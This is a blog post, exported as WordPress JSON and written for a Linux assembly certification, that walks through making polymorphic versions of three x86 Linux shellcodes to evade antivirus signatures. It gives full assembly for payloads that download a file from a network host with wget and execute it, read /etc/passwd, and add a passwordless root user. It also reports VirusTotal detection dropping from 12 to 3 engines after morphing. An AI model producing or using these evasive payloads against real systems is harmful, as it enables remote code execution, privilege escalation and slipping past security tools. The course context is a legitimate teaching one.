{"id":240,"date":"2020-08-28T11:30:00","date_gmt":"2020-08-28T11:30:00","guid":{"rendered":"https:\/\/badbit.vc\/?p=240"},"modified":"2020-09-02T21:08:28","modified_gmt":"2020-09-02T21:08:28","slug":"polymorphic-shellcode","status":"publish","type":"post","link":"https:\/\/badbit.vc\/index.php\/2020\/08\/28\/polymorphic-shellcode\/","title":{"rendered":"Polymorphic Shellcode"},"content":{"rendered":"\n

Polymorphism in the context of Shellcoding can be defined as altering the appearance of the code keeping the core functionality intact. Polymorphic shellcodes are created to beat signature based detection mechanisms which is how Antiviruses attempt to detect malicious files on systems.<\/p>\n\n\n\n

In this blogpost, we will take three Linux\/x86 shellcodes from shell-storm<\/a> and make a Polymorphic version of each in an attempt to evade signature based detections.<\/p>\n\n\n\n

The three Shellcodes are:<\/p>\n\n\n\n

  1. Download, chmod and execute an executable<\/a><\/li>
  2. Reads 4096 bytes from \/etc\/passwd file<\/a><\/li>
  3. Add root user with no password<\/a><\/li><\/ol>\n\n\n\n
    \n\n\n\n

    Let’s begin with the first one.<\/p>\n\n\n\n

    1. Download, chmod and execute<\/strong> an executable<\/strong><\/p>\n\n\n\n

    Original shellcode as taken from shell-storm.org:<\/p>\n\n\n\n

    \"\"<\/figure>\n\n\n\n

    In order to check the detection ratio, I quickly constructed an executable with a standard C harness. Below is the detection rate as seen on VirusTotal. As of now, 12\/73 Antivirus engines can detect the payload. Now let’s attempt to morph our shellcode and re-upload the file and check the detection rate.<\/p>\n\n\n\n

    \"\"<\/figure>\n\n\n\n

    I have added a comment mark wherever I have morphed the instructions:<\/p>\n\n\n\n

    global _start\nsection .text\n_start:\n    ;fork\n    xor ebx, ebx ;\n    mov ebx, 0x1 ;\n    xor ebx, ebx ;\n    xor eax,eax\n    mov al,0x2\n    int 0x80\n    xor ebx,ebx\n    cmp eax,ebx\n    jz child\n  \n    ;wait(NULL)\n    xor eax,eax\n    mov al,0x7\n    sub al,0x1 ;\n    inc eax    ;\n    int 0x80\n        \n    ;chmod x\n    xor ecx,ecx\n    xor eax, eax\n    xor edx, edx ;\n    inc edx      ;\n    dec edx      ;\n    push eax\n    mov al, 0xf ;chmod\n    push 0x78   ; x = filename\n    mov ebx, esp ; pathname\n    xor ecx, ecx\n    mov cx, 0x1ff ; 511\n    int 0x80\n    \n    ;exec x\n    xor eax, eax\n    push eax\n    push 0x78\n    mov ebx, esp\n    push eax\n    mov edx, esp\n    push ebx\n    mov ecx, esp\n    mov al, 20 ;\n    sub al, 9  ; al = 11\n;    mov al, 11\n    int 0x80\n    \nchild:\n    ;download 192.168.2.222\/\/x with wget\n    push 0xb\n    pop eax\n    cdq\n    push edx\n    \n    push 0x782f2f32 ;2\/\/x avoid null byte\n    push 0x32322e32 ;22.2\n    push 0x2e383631 ;.861\n    push 0x2e323931 ;.291\n    mov ecx,esp\n    push edx\n    \n    push 0x74 ;t\n    push 0x6567772f ;egw\/\n    push 0x6e69622f ;nib\/\n    push 0x7273752f ;rsu\/\n    mov ebx,esp\n    push edx\n    push ecx\n    push ebx\n    mov ecx,esp\n    int 0x80<\/code><\/pre>\n\n\n\n
    As we can see below, after uploading the executable created from our morphed shellcode on VirusTotal, as of the time when I am writing the post, only 3 out of 72 Antivirus engines could detect our payload. However, now that we have submitted it on VT, the paylaod will soon be signatured.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \n\n\n\n
    2.  Read \/etc\/passwd<\/strong><\/p>\n\n\n\n
    Following is the debugged shellcode:<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Morphed version:<\/p>\n\n\n\n
    global _start\n_start:\n\txor    ecx,ecx\n\tmul    ecx\n\tmov    al,0x5\n\tdec    al ;\n\tinc    al ;\n\tpush   ecx\n\tpush   0x64777373\n\tpush   0x61702f63\n\tpush   0x74652f2f\n\tmov    ebx,esp\n\tint    0x80\n\txchg   ebx,eax\n\txchg   ecx,eax\n\txchg   eax,ecx ;\n\txchg   ecx,eax ;\n\tmov    al,0x3\n\txor    edx,edx\n\tmov    dx,0xfff\n\tinc    edx ;\n\tdec    edx ;\n\tinc    edx\n\tint    0x80\n\txchg   edx,eax\n\txor    eax,eax\n\tmov    al,0x5 ;\n\tdec    al     ;\n\tmov    al,0x4\n\tmov    bl,0x1\n\tint    0x80\n\txchg   ebx,eax\n\tint    0x80<\/code><\/pre>\n\n\n\n
    \n\n\n\n
    3. Add root user with no password<\/strong><\/p>\n\n\n\n
    Below is the original shellcode:<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Here is the morphed version:<\/p>\n\n\n\n
    \n section .text\n \n       global _start\n \n  _start:\n       push byte 2 ;\n       push byte 5\n       pop eax\n       xor ecx, ecx\n       push ecx\n       push 0x64777373\n       push 0x61702f2f\n       push 0x6374652f\n       mov eax, 0x5 ;\n       mov ebx, esp\n       mov cx, 02001Q\n       int 0x80\n \n       mov ebx, eax\n \t   \n       push byte 4\n       pop eax\n       xor edx, edx\n       mov edx, 0x10 ;\n       sub edx, 0x10 ;\n       push edx\n       push 0x3a3a3a30\n       push 0x3a303a3a\n       push 0x74303072\n       mov ecx, esp\n       push byte 12\n       pop edx\n       int 0x80\n \n       xor eax, eax ;\n       mov eax, 0x6 ;\n       int 0x80\n \n       push byte 1\n       pop eax\n       int 0x80\n \nsection .data\n       db random: \"loremipsum\", 0x0<\/code><\/pre>\n\n\n\n
    That’s all for this post.<\/p>\n\n\n\n
    \n\n\n\n
    This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
    http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/<\/a><\/p>\n\n\n\n
    Student ID: PA-14690<\/p>\n\n\n\n
    Morphed shellcodes Github Repo<\/a><\/p>\n\n\n\n
    In the next<\/a> post, which is the also the last post of this series, we will write our own custom crypter for our payloads.<\/p>\n\n\n\n
    <\/p>\n","protected":false},"excerpt":{"rendered":"
    Polymorphism in the context of Shellcoding can be defined as altering the appearance of the code keeping the core functionality intact. Polymorphic shellcodes are created to beat signature based detection mechanisms which is how Antiviruses attempt to detect malicious files on systems. In this blogpost, we will take three Linux\/x86 shellcodes from shell-storm and make…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[7,5,8,6],"class_list":["post-240","post","type-post","status-publish","format-standard","hentry","category-shellcoding","category-slae-x86","tag-linux","tag-shellcode","tag-slae","tag-x86"],"_links":{"self":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/240","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/comments?post=240"}],"version-history":[{"count":7,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/240\/revisions"}],"predecessor-version":[{"id":334,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/240\/revisions\/334"}],"wp:attachment":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/media?parent=240"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/categories?post=240"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/tags?post=240"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}